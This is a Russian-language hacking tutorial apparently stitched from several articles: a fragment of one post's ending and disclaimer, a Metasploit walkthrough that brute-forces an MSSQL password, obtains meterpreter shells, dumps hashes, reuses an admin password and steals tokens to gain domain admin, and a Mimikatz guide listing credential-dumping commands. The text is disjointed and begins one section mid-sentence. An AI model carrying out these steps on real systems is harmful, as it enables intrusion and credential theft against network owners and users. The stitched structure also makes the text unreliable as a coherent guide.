У Metasploit есть много возможностей, которые мы продолжим рассматривать в следующих статьях по Metasploit . Попробуйте пока некоторые из хаков на Metasploit ‘е, описанные в других постах на сайте. Возвращайтесь обязательно! Вы изучите Metasploit и научитесь взламывать, как профессионал!

Отказ от ответственности : Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.

может быть ВНЕЗАПНО использован в качестве инструмента для тестирования на проникновение (аудита безопасности IT-инфраструктуры), состоит из множества утилит, образующих платформу для реализации широкого спектра атак. Покажу пару примеров Metasploit, которые могут быть использованы в качестве алгоритма пентеста. При этом буду пользоваться только метасплойтом, чтоб показать его мощь и гибкость. Как платформа для атак использую Backtrack 5 R2, на которую установлен сам метасплойт. Так же очень важно отметить, что там же работает СУБД postgresql, котоая принимает подключения. Сеть для тестирования сценариев - 192.168.3.0/24.
Приступаем;)

1. Открываем msfconsole, проверяем статус базы данных.

хорошо, поговорим о воркспейсах (workspaces), которые испоьзуются в метасплойте как логические единицы информации. Можно иметь разные воркспейсы для разных пентестов или разные местоположения (location) для пентеста. Таким образом, легко ипортировать\экспортировать данные между разными воркспейсами.

В одном воркспейсе хранится несколько таблиц данных, например hosts, services, vulns, loot и notes.
В эти таблицы можно добавлять информацию вручную, например, добавим хост в таблицу.

Так же можно добавить сервис в таблицу сервисов.

Для заполнения этих таблиц автоматизированно, можно использовать db_nmap. Так же можно использовать какую-то любую (твою любимую, например) утилиту для сканирования, экспортировать результаты её работы в XML-файл, а потом - импортировать его в метасплойт. Это можно сделать, использовав db_import внутри меню метасплойт (перечень форматов отчётов, которые понимает метасплойт - ниже).


Посканируем nmap.

Посмотрим, какие хосты содержатся в таблице hosts после этого.


В таблице сервисов можно отфильтровать только нужные нам столбцы.

Поскольку мы видим слишком много виндовс-машинок, используем модуль auxiliary, который сканирует версию smb.

Выбрать один из хостов надо командой set. Но мы сделаем хосты один за другим, что удобно делать с помощью базы. Мы добавим хосты из базы сервисов с портом 445 в файл.

После сканирования посмотрим в таблицу сервисов.

Имеем хосты с Windows 2003, один хост с Windows 2003 сервис паком 1. Видим имена хостов и имя домена - "TEST".
Остальная информация (я предполагаю что это так, исходя из имён хостов):
TEST-EMEA-DC-01 - контроллер домена
TEST-EMEA-DB-01 - сервер баз данных

Хорошо, поработаем с потенциальным сервером БД.

Предположил, что там установлена СУБД MSSQL (т.к. винда же..), но мускуль обічно работает на порту 1433, которій отсуствует в списке. "Выстрелю вслепую" и попробую запустить тест для СУБД MSSQL.

Похоже, вышло.

Хорошо. Создам инстанс mssql. Запуск на порту 1043, SQLEXPRESS. Он имеет версию 9.00.4035.00, билд которой соответствует Microsoft SQL 2005 SP3. Глянем таблицу сервисов, что изменилось там?

Добавилось: порт 1043 как mssql и UDP-порт 1433. Это порт, который реально используется mssql.
Теперь мызнаем, что сервис баз данных работает на этом порту и можем организовать брутфорс-атаку, используя всё тот же метасплойт.

Укажем верный номер удалённого порта (СУБД слушает нас на 1043 порту), имя пользователя и пароль.

Запустим и успешно найдём пароль.

Окей. Есть пароль и это наш парвый credential. В таблице creds увидим его.

Время создать эксплойт.


Знаем имя пользователя, пароль и порт.

Получаем шелл meterpreter.

Отложим эту сессию. Обратимся к списку сессий, увидим там 1 сессию.

Далее покажу как использовать некоторые модули, которые полезны после эксплуатации системы.

Используя smart _hashdump, можно проверить хеши. Устанавливаю параметры SESSIONS и GETSYSTEM.

Запускаю.


Имеем обновления в таблице loot.
Я получил привилегии SYSTEM и 2 хеша. Кажется, что это действующий аккаунт администратора (у учётки “localadmin” RID всегда 500).

Глянем в таблицу loot.

В таблице 3 вкусняшки.

Проверю, используется ли этот пароль админа в других системах. Всё, что мне для этого надо, у меня есть.

Добавлю список хостов из таблицы services (мы сохранили его раньше).

Ломать хеш не будем (а зачем?), просто посмотрим. Установим параметры BLANK_PASSWORDS и USER_AS_PASS в значение "ложь".

Увидим много успешных входов после запуска. Вывод - админ имеет один пароль на несколько машин в сети.

Нашлись ещё несколько креденшелов.


я получил локальные пароли к уязвимым виндовс-системам. Можо использовать эксплойт
psexec, но придётся перебирать все хосты один за другим вручную, а это не удобно.
В эксплойтах обычно надо задать параметр - RHOST, а не RHOSTS и поэтому нельзя задать список хостов для поиска уязвимостей.
Покажу как можно автоматизировать этот процесс с помощью скриптов.

Из разных источников в Интернете слепил этот скрипт. Его можно легко изменить и добавиь функционала.

Сейчас я запустил psexec.
Но я не могу запускать этот скрипт, т.к. тут используется полезная нагрузка (payload) windows/meterpreter/reverse_tcp
с которой возникает проблема - слушающий порт не может быть одинаков. Поэтому использую payload windows/meterpreter/bind_tcp.

Запущу свой скриптик.

Наблюдаем 9 сессий и аккаунт localadmin"а.

Поищем ещё хеши, теперь делаем это традиционно вручную, взаимодействуя с каждой сессией и дампя хеши.
Альтернативно можно испоьзовать модуль credential collector. Этот модуль даст нам хеши и (что важно!) задействует incognito и look для токенов доменов. К сожалению, модуль требует запускать себя вручную шаг за шагом для каждой сессии, если конечно нет соответствующего файла, где они хранятся...

Запускаю сбор хешей и токенов.

Сессии 5 и 6 кажется имеют интересные токены доменов.

Попытка украсть домен и вуаля - мы имеем доступ уровня админа домена.

Пример показал некоторые возможности Metasploit и компонентов этой платформы.
PS: Удачи в ненарушении КПК (!#)

Metasploit - настолько мощный инструмент, что мы в статьях можем только слегка поцарапать поверхность его возможностей. Постоянная его разработка и улучшения ведутся много лет, и сейчас Metasploit можно использовать практически для любых задач, начиная от разведывательных действий, пост-эксплуатации и заканчивая скрытием ваших следов. Учитывая его универсальность, каждый начинающий хакер должен иметь хотя бы поверхностное понимание того, как работать с Metasploit.

Всякий раз, когда выходит какой-нибудь мощный модуль пост-эксплуатации, каждый пользователь Metasploit должен знать об этом, потратить время и научиться его использовать. Mimikatz - один из таких модулей. Он был создан Бенджамином Делпи (Benjamin Delpy) с ником gentilkiwi, который разработал его, чтобы выучить язык C, а заодно исследовать Windows на безопасность. В принципе, этот модуль способен извлекать различные наборы учетных данных Windows прямо из оперативной памяти.

Первоначально Mimikatz разрабатывался как автономный модуль, который мы можем загружать или запускать локально на целевом компьютере. Но недавно Rapid7 портировали его для Metasploit, сделав из него сценарий для Meterpreter. Преимущество этого подхода заключается в том, что он работает полностью в памяти, не оставляя на жестком диске никаких следов своего присутствия, которые могут быть в последствии обнаружены.

В этом уроке мы будем использовать модуль Metasploit, который немного ограничен в своих возможностях, но мы обещаем, что сделаем в ближайшее время подробную статью о более мощном автономном инструменте.

Еще один ключевой момент перед тем, как мы начнем: есть 32- и 64-битные версии Mimikatz. Часто Mimikatz загружает 32-битную версию, если мы использовали 32-битный процесс для компрометации системы. Если вдруг это произойдет, то Mimikatz будет практически полностью нефункциональным. Чтобы избежать этой потенциальной проблемы необходимо использовать команду «migrate» для перевода Meterpeter в 64-битный процесс перед загрузкой Mimkatz. Таким образом, он загрузит 64-битную версию, и вы получите, наконец, доступ ко всем его потрясающим возможностям.

Шаг 1. Эксплуатация целевой машины и использование полезных нагрузок Meterpreter

Mimikatz - это пост-эксплуатационный модуль, а это означает, что его можно использовать только после того, как цель будет эксплуатирована. В результате мы начнем рассмотрение работы этого модуля, исходя из предположения о том, что вы успешно произвели эксплуатацию уязвимости на целевой машине и установили полезную нагрузку (payload) Meterpreter в целевой системе. Кроме того, для работы Mimikatz вам понадобятся полномочия системного администратора. Если вы провели эксплуатацию уязвимостей целевой системы как обычный пользователь, то вы можете использовать команду getsystem для получения расширенных прав.

Meterpreter > getsystem

Теперь, когда у нас есть привилегии администратора, нам нужно загрузить модуль Mimikatz.

Meterpreter> load mimikatz

Теперь посмотрим справку.

Meterpreter> help mimikatz

Как вы можете видеть, у Mimikatz есть несколько собственных команд и специальная команда mimikatz_command, которая позволяет запускать пользовательские команды.

Meterpreter > mimikatz_command -f version

Metasploit портировал только версию 1.0, хотя Mimikatz находится в версии 2.0 (следите за нашими следующими статьями об использовании автономной версии Mimikatz 2.0).

Шаг 2. Собственные команды

Начнем с того, что посмотрим, что можно сделать с системой при помощи собственных команд Mimikatz. Если мы хотим получить учетные данные Kerberos, нужно просто ввести:

Meterpreter> kerberos

Мы можем получить учетные данные Windows MSV, набрав:

Meterpreter> msv

Шаг 3. Mimikatz_Command

Mimikatz также позволяет создавать пользовательские команды. Команды принимают следующий синтаксис. Обратите внимание на двойное двоеточие (: 🙂 между типом команды и действием команды.

Mimikatz_command -f::

Если мы хотим получить хеши паролей из файла SAM, мы можем использовать такую команду:

Meterpreter > mimikatzcommand -f samdump::hashes

Конечно, получив эти хеши, мы можем взломать их любым из нескольких инструментов для взлома паролей, таким как «Cain и Abel», Hashcat, «John the Ripper» и другие.

Если мы хотим получить список сервисов, запущенных на целевой системе, то можем использовать команду service в сочетании командой list.

Meterpreter > mimikatz_command -f service::list

Шаг 4. Crypto

У Mimikatz есть специальный тип команды, которая обрабатывает зашифрованную информацию и, как вы могли догадаться, называется она crypto. Используя эту команду, мы можем получить список поставщиков шифрования на целевой системе.

Meterpreter > mimikatz_command -f crypto::listProviders